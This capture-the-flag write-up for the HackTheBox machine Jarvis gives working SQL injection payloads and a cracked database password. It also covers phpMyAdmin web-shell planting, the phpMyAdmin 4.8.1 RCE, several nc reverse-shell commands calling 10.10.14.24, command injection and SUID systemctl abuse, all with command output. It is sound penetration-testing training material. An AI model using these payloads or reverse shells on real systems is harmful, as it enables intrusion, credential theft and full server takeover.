HackTheBox - Jarvis

Overview

This machine begins w/ a webpage enumeration, a vulnerable GET parameter ?cod= is susceptible to SQLi, through the SQLi, we are able to extract DBMS user DBadmin’s hash, and crack it w/ hashcat. Next, we are able to insert a web shell through phpmyadmin portal, allowing us to obtain a low-privilege/www-data shell.

For privilege escalation, we have to privilege escalate twice, once to pepper and then to root. User www-data has a sudoers entry that allows www-data to execute simpler.py as pepper. After analyzing the source code of simpler.py it is susceptible to command injection due to insufficient input sanitization (some characters were missed out /$(), allowing us to privilege escalate to pepper via setuid on bash.

After more enumeration, there is a binary called systemctl that has root SUID bit on it, systemctl has a GTFOBins entry, we are able to create a malicious service that will invoke a reverse shell when executing systemctl, privilege escalating us to root.

If you wish to practice SQLi similar to this, try:

• Vulnhub DC9
• Vulnhub NullByte 1
• Vulnhub pWnOS 2.0
• Vulnhub HackMe
• TryHackMe The Marketplace
• TryHackMe Game Zone
• HackTheBox Shared (Not Retired Yet)

---

Column	Details
Box Name	Jarvis
IP	10.10.10.143
Points	30
Difficulty	Medium
Creator	manulqwerty & Gh0spp7
Release Date	22 Jun 2019

Recon

TCP/80 (HTTP)

• FFUF

    301      GET        9l       28w      310c http://10.10.10.143/css => http://10.10.10.143/css/
    301      GET        9l       28w      312c http://10.10.10.143/fonts => http://10.10.10.143/fonts/
    200      GET       68l      167w     2237c http://10.10.10.143/footer.php
    301      GET        9l       28w      313c http://10.10.10.143/images => http://10.10.10.143/images/
    200      GET      543l     1653w        0c http://10.10.10.143/index.php
    301      GET        9l       28w      309c http://10.10.10.143/js => http://10.10.10.143/js/
    200      GET       43l       85w     1333c http://10.10.10.143/nav.php
    301      GET        9l       28w      317c http://10.10.10.143/phpmyadmin => http://10.10.10.143/phpmyadmin/
    302      GET      101l      231w     3024c http://10.10.10.143/room.php => index.php
    403      GET       11l       32w      300c http://10.10.10.143/server-status
  

  • phpmyadmin.
• Nikto

    ┌──(root💀kali)-[~/htb/jarvis]                                                  
    └─# nikto -h http://jarvis.htb;                                                 
    Uncommon header 'ironwaf' found, with contents: 2.0.3                         
  

  • ironwaf 2.0.3

TCP/64999 (HTTP)

• FFUF

    200      GET        1l       11w       54c http://10.10.10.143:64999/index.html
  

  • index.html
• CURL

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143]
    └─# curl jarvis.htb:64999
    Hey you have been banned for 90 seconds, don't be bad
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143]
    └─# curl jarvis.htb:64999/asdf
    Hey you have been banned for 90 seconds, don't be bad
  

  • Banned by WAF?

Initial Foothold

TCP/80 (HTTP) - GET parameter enumeration

1. Tried to use default creds to login to phpmyadmin panel, failed
2. Found something interesting after browsing the source code of jarvis.htb

    room.php?cod=1
   

   

   • Vulnerable to LFI/SQLi?
3. Enumerate GET parameter ?cod=1 for LFI, failed

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# ffuf -u http://10.10.10.143/room.php?cod=../../../../../FUZZ -w /usr/share/wordlists/LFI/file_inclusion_linux.txt  -fw 308
   	
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# ffuf -u http://10.10.10.143/room.php?cod=1../../../../../FUZZ -w /usr/share/wordlists/LFI/file_inclusion_linux.txt  -fw 308
   	
    :: Progress: [2249/2249] :: Job [1/1] :: 728 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
   

4. Enumerate GET parameter ?cod=1 for SQLi w/ sqlmap, success!

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# sqlmap -r sqli.txt -p cod --batch
   	
    Parameter: cod (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cod=1 AND 6949=6949
   	
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: cod=1 AND (SELECT 4379 FROM (SELECT(SLEEP(5)))EdRY)
   	
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: cod=-6596 UNION ALL SELECT CONCAT(0x71626b7871,0x556466584f47547078516c617275656c676b6f704d757175784e4868546a724d694f427061467451,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL-- -
   

TCP/80 (HTTP) - Manual SQLi

1. Testing how room.php reacts to SQLi

    --------------------------------Payload------------------------------------
    # Payload 1 
    1'
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl -s "jarvis.htb/room.php?cod=1'" | grep -oP "room\.php\?cod\=\d"
    Nothing displayed
   	
    # Payload 2
    1"
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl -s 'jarvis.htb/room.php?cod=1"' | grep -oP "room\.php\?cod\=\d"
    Nothing displayed
   	
    # Payload 3 
    1+1
    1%2b1 
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl -s 'jarvis.htb/room.php?cod=1%2b1' | grep -oP "room\.php\?cod\=\d"
    room.php?cod=2
   	
    # Payload 4 
    '#'
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl -s 'jarvis.htb/room.php?cod=1#' | grep -oP "room\.php\?cod\=\d"
    room.php?cod=1
   	
    # Payload 5
    '-- -'
    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl -s 'jarvis.htb/room.php?cod=1--+-' | grep -oP "room\.php\?cod\=\d"
    room.php?cod=1
   
    ------------------------------Hypothesis------------------------------------
    # Hypothesis, no quotes are used
    SELECT * FROM room WHERE id=$_GET["cod=1"]	
   
    # Syntax Error, because of unclosed quote `'`
    SELECT * FROM room WHERE id=1'
   	
    # Syntax Error, because of unclosed quote `"`
    SELECT * FROM room WHERE id=1"
   	
    # It works, valid SQL statement
    SELECT * FROM room WHERE id=1+1
   	
    # It works w/ or w/o the comments, it means there are no further SQL commands behind it, or the SQL commands behind does not affect our query.
    SELECT * FROM room WHERE id=1#
    SELECT * FROM room WHERE id=1-- -
   

2. Determine number of columns w/ wfuzz

    ┌──(root💀kali)-[~/htb/jarvis]
    └─# wfuzz -c -z range,1-10 "http://jarvis.htb/room.php?cod=1 order by FUZZ"
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
   	
    Target: http://jarvis.htb/room.php?cod=1%20order%20by%20FUZZ
    Total requests: 10
   	
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload           
    =====================================================================
   	
    000000002:   200        190 L    466 W      6204 Ch     "2"      
    000000007:   200        190 L    466 W      6204 Ch     "7"      
    000000010:   200        189 L    443 W      5916 Ch     "10"     
    000000008:   200        189 L    443 W      5916 Ch     "8"      
    000000001:   200        190 L    466 W      6204 Ch     "1"      
    000000003:   200        190 L    466 W      6204 Ch     "3"      
    000000009:   200        189 L    443 W      5916 Ch     "9"      
    000000005:   200        190 L    466 W      6204 Ch     "5"      
    000000006:   200        190 L    466 W      6204 Ch     "6"      
    000000004:   200        190 L    466 W      6204 Ch     "4"      
   	
    Total time: 0
    Processed Requests: 10
    Filtered Requests: 0
    Requests/sec.: 0
   

   • We can conclude that there are 7 columns
     • ORDER BY 1-7 : 190 L
     • ORDER BY 8-10: 189 L
3. Determine number of columns w/ burp

    # Payload
    ORDER BY 7
    ORDER BY 8
   
    # Hypothesis
    SELECT * FROM hotel WHERE id = 1 ORDER BY 7 
   

   

4. Determine reflected columns

    # Payload
    -1+UNION+SELECT+1,2,3,4,5,6,7
   

   

5. Determine all databases

    # Payload -1+UNION+SELECT+1,group_concat("database:",schema_name,"\n"),3,4,5,6,7+FROM+information_schema.schemata 
   

   

    Database:
    hotel
    information_schema
    mysql
    performance_schema
   

6. Determine tables in hotel database

    # Payload
    -1+UNION+SELECT+1,group_concat("table:",table_name,"\n"),3,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema='hotel'
   

   

    Database: hotel
    [1 Tables]
    room
   

7. Determine columns in room table from hotel database

    # Payload
    -1+UNION+SELECT+1,group_concat("column:",column_name,"\n"),3,4,5,6,7+FROM+information_schema.columns+WHERE+table_name='room'
   

   

    Database: hotel
    Table: room
    [7 Columns]
    cod
    name
    price
    descrip
    star
    image
    mini
   

   • Not useful
8. Lets try to obtain a DBMS user to login to phpmyadmin
9. Determine tables in mysql database

    # Payload
    -1+UNION+SELECT+1,group_concat("table:",table_name,"\n"),3,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema='mysql' 
   

   

    Database: mysql
    [1 Useful Table]
    user
   

10. Determine columns in user table from mysql database

     # Payload
     -1+UNION+SELECT+1,group_concat("column:",column_name,"\n"),3,4,5,6,7+FROM+information_schema.columns+WHERE+table_name='room'
    

    

     Database: mysql
     Table: user
     [2 Useful Columns]
     User
     Password
    

11. Dump entries from user table from mysql database

    # Payload
    -1+UNION+SELECT+1,group_concat(User,':',Password,'\n'),3,4,5,6,7+FROM+mysql.user 
    

    

    DBadmin:*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
    

Crack Hash

1. Identify hash w/ name that hash
2. Crack hash w/ hashcat

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# hashcat -a 0 -m 300 '2D2B7A5E4E637B8FBA1D17F40318F277D29964D0' /usr/share/wordlists/rockyou.txt --show
    2d2b7a5e4e637b8fba1d17f40318f277d29964d0:imissyou
   

   • DBadmin:imissyou

TCP/80 (HTTP) - SQLi2RCE, Insert Webshell w/ phpmyadmin

1. Successfully login to phpmyadmin w/ DBadmin:imissyou
2. Proceed to hotel -> SQL -> Insert Webshell

    SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
   

   

3. Test http://jarvis.htb/shell.php

    # Payload
    ?cmd=id;whoami
   

   

4. Invoke reverse shell

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# curl 'http://10.10.10.143/shell.php?cmd=nc+10.10.14.24+4444+-e+/bin/bash'
   

   

5. Demo - Insert webshell & RCE

Initial Foothold - Alternatives

Obtain DBMS user

1. Instead of enumerating the mysql database and extracting the username & hash, we use LOAD_FILE() function, to potentially include a file w/ credentials.
2. Use TO_base64() to encode room.php, otherwise nothing will be displayed, similar to php://filter/convert.base64-encode/resource=<file>.
3. Load Base64 encoded room.php

    # Payload
    -1%20UNION%20SELECT%201,TO_base64(LOAD_FILE('/etc/passwd')),3,4,5,6,7 
   

   

4. Decode base64 encoded room.php

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# base64 -d room.php.b64 | head
    <?php
    error_reporting(0);
    if($_GET['cod']){
       include("connection.php");
        include("roomobj.php");
        $result=$connection->query("select * from room where cod=".$_GET['cod']);
        $line=mysqli_fetch_array($result);
        $room=new Room();
        $room->cod=$line['cod'];
        $room->name=$line['name'];
   

   • connection.php - contains credentials to connect to mysql
5. Load Base64 encoded connection.php

    # Payload
    ?cod=-1%20UNION%20SELECT%201,TO_base64(LOAD_FILE('/var/www/html/connection.php')),3,4,5,6,7 
   

   

6. Decode base64 encoded connection.php

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/loot]
    └─# echo "PD9waHAKJGNvbm5lY3Rpb249bmV3IG15c3FsaSgnMTI3LjAuMC4xJywnREJhZG1pbicsJ2ltaXNz
    eW91JywnaG90ZWwnKTsKPz4K" | base64 -d
    <?php
    $connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
    ?>
   

   • DBadmin:imissyou

SQLi2RCE (1) - Insert Webshell

1. Insert webshell directly

    # Payload
    -1+UNION+SELECT+1,"<?php+system($_GET['cmd'])?>",3,4,5,6,7+INTO+OUTFILE+"/var/www/html/shell.php"
   

   

2. Demo - Insert webshell & RCE

SQLi2RCE (2) - phpmyadmin 4.8.x RCE

1. Search exploits for phpmyadmin 4.8

   Exploit Title	Path
   phpMyAdmin 4.8.1 - Remote Code Execution (RCE)	php/webapps/50457.py

2. How does phpmyadmin 4.8.x RCE work?
   1. An attacker is able to do LFI by bypassing a validation checking function Core::checkPageValidity.
   2. The attacker can do LFI2RCE by inserting code into his session and using the LFI vulnerability to invoke the reverse shell.
3. Exploiting phpmyadmin 4.8.x
   1. Obtain login credentials from SQLi, DBadmin:imissyou
   2. Run exploit

       ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
       └─# python 50457.py jarvis.htb 80 /phpmyadmin DBadmin imissyou 'whoami;id'
       www-data
       uid=33(www-data) gid=33(www-data) groups=33(www-data)
      

   3. Obtain www-data shell

       ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
       └─# python 50457.py jarvis.htb 80 /phpmyadmin DBadmin imissyou 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 4444 >/tmp/f'
      

4. Demo - phpmyadmin 4.8.x RCE

SQLi2RCE (3) - phpmyadmin 4.8.x RCE (Manual)

1. Login to phpmyadmin w/ DBadmin:imissyou
2. Obtain sessionID from cookies
3. Proceed to hotel -> SQL -> Insert php code

    SELECT "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 4444 >/tmp/f')?>" 
   

   • sess_<sessionID> contains our reverse shell
4. Test LFI vulnerability

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# curl -s -H "Cookie: pma_lang=en; phpMyAdmin=d963f4qde4pmfnmrjdm2dn4e6h47sb4b; pmaUser-1=%7B%22iv%22%3A%22v1BznIkSmLVOsHVNNTFNqQ%3D%3D%22%2C%22mac%22%3A%22c78b88523c9bde8612542e3ce67172a21db0154a%22%2C%22payload%22%3A%22523W1rt6fC2qxsUXfQrJrg%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22XQxWd17wpYGgtC47V%2Bmugg%3D%3D%22%2C%22mac%22%3A%22463835e7a5b0b2227709214784a62ae37c7ff083%22%2C%22payload%22%3A%22fnlqZmb0DJ8CIIpS3Rt7cjIpGoZgRfmaHxOWL%5C%2FRpeZg%3D%22%7D; PHPSESSID=0aa5cj91ql3ft2njal6so18ml1" "http://jarvis.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd" 
    ...
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
    ...
   

   

5. Start listener

    ┌──(root💀kali)-[~/htb/jarvis]
    └─# nc -nvlp 4444
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::4444
    Ncat: Listening on 0.0.0.0:4444
   

6. Invoke the reverse shell by using the LFI vulnerability to include sess_<sessionID>

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# curl -s -H "Cookie: pma_lang=en; phpMyAdmin=d963f4qde4pmfnmrjdm2dn4e6h47sb4b; pmaUser-1=%7B%22iv%22%3A%22v1BznIkSmLVOsHVNNTFNqQ%3D%3D%22%2C%22mac%22%3A%22c78b88523c9bde8612542e3ce67172a21db0154a%22%2C%22payload%22%3A%22523W1rt6fC2qxsUXfQrJrg%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22XQxWd17wpYGgtC47V%2Bmugg%3D%3D%22%2C%22mac%22%3A%22463835e7a5b0b2227709214784a62ae37c7ff083%22%2C%22payload%22%3A%22fnlqZmb0DJ8CIIpS3Rt7cjIpGoZgRfmaHxOWL%5C%2FRpeZg%3D%22%7D; PHPSESSID=0aa5cj91ql3ft2njal6so18ml1" "http://jarvis.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_d963f4qde4pmfnmrjdm2dn4e6h47sb4b
   

7. Demo - php 4.8.x RCE (manual)

SQLi2RCE (4) - SQLMap

1. Enumerate databases

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# sqlmap -r sqli.txt -p cod --dbs --output-dir=$(pwd)/sqlmap --batch
   	
    Parameter: cod (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cod=1 AND 3554=3554
   	
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: cod=1 AND (SELECT 7164 FROM (SELECT(SLEEP(5)))EEJY)
   	
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: cod=-3228 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x554b49484f6b664e4e484452436e707246495353424c6444447a665144427579547863494d6f5946,0x7171627a71),NULL,NULL,NULL,NULL-- -
   	
   	
    available databases [4]:                       
    [*] hotel
    [*] information_schema
    [*] mysql
    [*] performance_schema
   

2. Enumerate tables in hotel database

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# sqlmap -r sqli.txt -p cod -D hotel --tables --output-dir=$(pwd)/sqlmap --batch
   	
   	
    Parameter: cod (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cod=1 AND 3554=3554
   	
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: cod=1 AND (SELECT 7164 FROM (SELECT(SLEEP(5)))EEJY)
   	
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: cod=-3228 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x554b49484f6b664e4e484452436e707246495353424c6444447a665144427579547863494d6f5946,0x7171627a71),NULL,NULL,NULL,NULL-- -
   
    Database: hotel
    [1 table]
    +------+
    | room |
    +------+
   

3. Enumerate columns in room table

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# sqlmap -r sqli.txt -p cod -D hotel -T room --columns --output-dir=$(pwd)/sqlmap --batch
   	
    Parameter: cod (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cod=1 AND 3554=3554
   	
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: cod=1 AND (SELECT 7164 FROM (SELECT(SLEEP(5)))EEJY)
   	
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: cod=-3228 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x554b49484f6b664e4e484452436e707246495353424c6444447a665144427579547863494d6f5946,0x7171627a71),NULL,NULL,NULL,NULL-- -
   	
    Database: hotel                                                      
    Table: room
    [7 columns]
    +---------+--------------+
    | Column  | Type         |
    +---------+--------------+
    | cod     | int(11)      |
    | descrip | varchar(400) |
    | image   | varchar(40)  |
    | mini    | varchar(400) |
    | name    | varchar(35)  |
    | price   | int(11)      |
    | star    | varchar(350) |
    +---------+--------------+
   

   • Not useful information
4. SQLMap - Spawn an interactive shell

    ┌──(root💀kali)-[~/htb/jarvis/10.10.10.143/exploit]
    └─# sqlmap -r sqli.txt -p cod --os-shell --output-dir=$(pwd)/sqlmap --batch
   	
    Parameter: cod (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: cod=1 AND 3554=3554
   	
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: cod=1 AND (SELECT 7164 FROM (SELECT(SLEEP(5)))EEJY)
   	
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: cod=-3228 UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x554b49484f6b664e4e484452436e707246495353424c6444447a665144427579547863494d6f5946,0x7171627a71),NULL,NULL,NULL,NULL-- -
   	
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] JSP
    [4] PHP (default)
    -> 4
    [20:07:10] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    -> 1
    os-shell> id;whoami
    do you want to retrieve the command standard output? [Y/n/a] Y
    command standard output:
    ---
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data
   

5. Demo - SQLMap spawn shell

Privilege Escalation

Pepper - Enumeration

1. Check www-data sudo access

    www-data@jarvis:/var/www/html$ sudo -l
    Matching Defaults entries for www-data on jarvis:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
   	
    User www-data may run the following commands on jarvis:
        (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
    www-data@jarvis:/var/www/html$ 
   

   • simpler.py
2. View simpler.py

   Cropped to show vulnerable portion

Pepper - What is simpler.py doing?

1. simpler.py has 3 functions
   1. To display number of attackers, derived from counting the number of files in /home/pepper/web/Logs/ directory.
   2. To display IP Address of attackers, derived from reading files in /home/pepper/web/Logs directory.
   3. Ping any IP Address

Pepper - Exploiting simpler.py

1. Why is simpler.py, specifically exec_ping() function vulnerable?
   1. After skimming through the files, exec_ping() function stood out because it is using os_system to execute commands.
   2. There is an input sanitization function in place, however it is insufficient.
      • forbidden = ['&', ';', '-', 'backticks', '||', '|']
2. How do we exploit simpler.py?
   1. We have to first choose the ping function by specifying -p, this will bring us to the exec_ping() function.
   2. We are able do command injection w/ $(Payload), since (), $ and / is not in array of forbidden characters.
3. Exploiting simpler.py
   1. Create /tmp/pepperbash by copying /bin/bash

       www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
       ***********************************************
            _                 _                       
        ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
       / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
       \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
       |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                       |_|               |_|    |___/ 
                                       @ironhackers.es
      		                                
       ***********************************************
      		
       Enter an IP: $(cp /bin/bash /tmp/pepperbash)
       Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
                   [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
                   [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
                   [-w deadline] [-W timeout] [hop1 ...] destination
       Usage: ping -6 [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
                    [-l preload] [-m mark] [-M pmtudisc_option]
                    [-N nodeinfo_option] [-p pattern] [-Q tclass] [-s packetsize]
                    [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline]
                    [-W timeout] destination
      

   2. Check if /tmp/pepperbash is created

       www-data@jarvis:/var/www/html$ ls -la /tmp | grep pepper
       -rwxr-xr-x  1 pepper pepper 1099016 Sep 14 17:22 pepperbash
      

   3. Set SUID bit on /tmp/pepperbash

       www-data@jarvis:/var/www/html$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
       ***********************************************
            _                 _                       
        ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
       / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
       \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
       |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                       |_|               |_|    |___/ 
                                       @ironhackers.es
      		                                
       ***********************************************
      		
       Enter an IP: $(chmod 4755 /tmp/pepperbash)
       Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
                   [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
                   [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
                   [-w deadline] [-W timeout] [hop1 ...] destination
       Usage: ping -6 [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
                    [-l preload] [-m mark] [-M pmtudisc_option]
                    [-N nodeinfo_option] [-p pattern] [-Q tclass] [-s packetsize]
                    [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline]
                    [-W timeout] destination
      

   4. Execute /tmp/pepperbash to privilege escalate to pepper

       www-data@jarvis:/var/www/html$ ls -la /tmp/pepperbash
       -rwsr-xr-x 1 pepper pepper 1099016 Sep 14 17:22 /tmp/pepperbash
      		
       www-data@jarvis:/var/www/html$ /tmp/pepperbash -p
       pepperbash-4.4$ id;whoami
       uid=33(www-data) gid=33(www-data) euid=1000(pepper) groups=33(www-data)
       pepper
       pepperbash-4.4$ 
      

4. Demo - simpler.py Privilege Escalation
5. Obtain persistent access w/ SSH
   1. Create .ssh

       pepperbash-4.4$ mkdir .ssh
      

   2. Copy your id_rsa.pub key, place it in target’s .ssh/authorized_keys

       pepperbash-4.4$ echo "your id_rsa.pub" > .ssh/authorized_keys
      

   3. Change permissions of authorized_keys

       pepperbash-4.4$ chmod 600 .ssh/authorized_keys
      

   4. SSH into target

       ┌──(root💀kali)-[~/htb/jarvis]
       └─# ssh pepper@jarvis.htb
      

6. Demo - Persistent access w/ SSH

Root - Enumeration

1. Found something interesting w/ linpeas.sh
   • systemctl - has a GTFOBins Entry

Root - SUID GTFOBINS

1. How do we exploit systemctl
   • If the binary has the SUID bit set, it does not drop the elevated privileges.
   • We are able to create our own malicious service containing a reverse shell, allowing us to privilege escalate to root
2. Exploiting systemctl
   1. Start listener

       ┌──(root💀kali)-[~/htb/jarvis]
       └─# nc -nvlp 4444
       Ncat: Version 7.92 ( https://nmap.org/ncat )
       Ncat: Listening on :::4444
       Ncat: Listening on 0.0.0.0:4444
      

   2. Paste this - Create malicious service

       TF=$(mktemp).service
       echo '[Service]
       Type=oneshot
       ExecStart=/bin/sh -c "nc 10.10.14.24 4444 -e /bin/bash > /tmp/output"
       [Install]
       WantedBy=multi-user.target' > $TF
       /bin/systemctl link $TF
       /bin/systemctl enable --now $TF
      

   3. root obtained

       ┌──(root💀kali)-[~/htb/jarvis]
       └─# nc -nvlp 4444
       Ncat: Version 7.92 ( https://nmap.org/ncat )
       Ncat: Listening on :::4444
       Ncat: Listening on 0.0.0.0:4444
       Ncat: Connection from 10.10.10.143.
       Ncat: Connection from 10.10.10.143:48096.
       id;whoami
       uid=0(root) gid=0(root) groups=0(root)
       root
       cd ~
       ls
       clean.sh
       root.txt
       sqli_defender.py
       wc -c root.txt
       33 root.txt
      

3. Demo - GTFOBins systemctl Privilege Escalation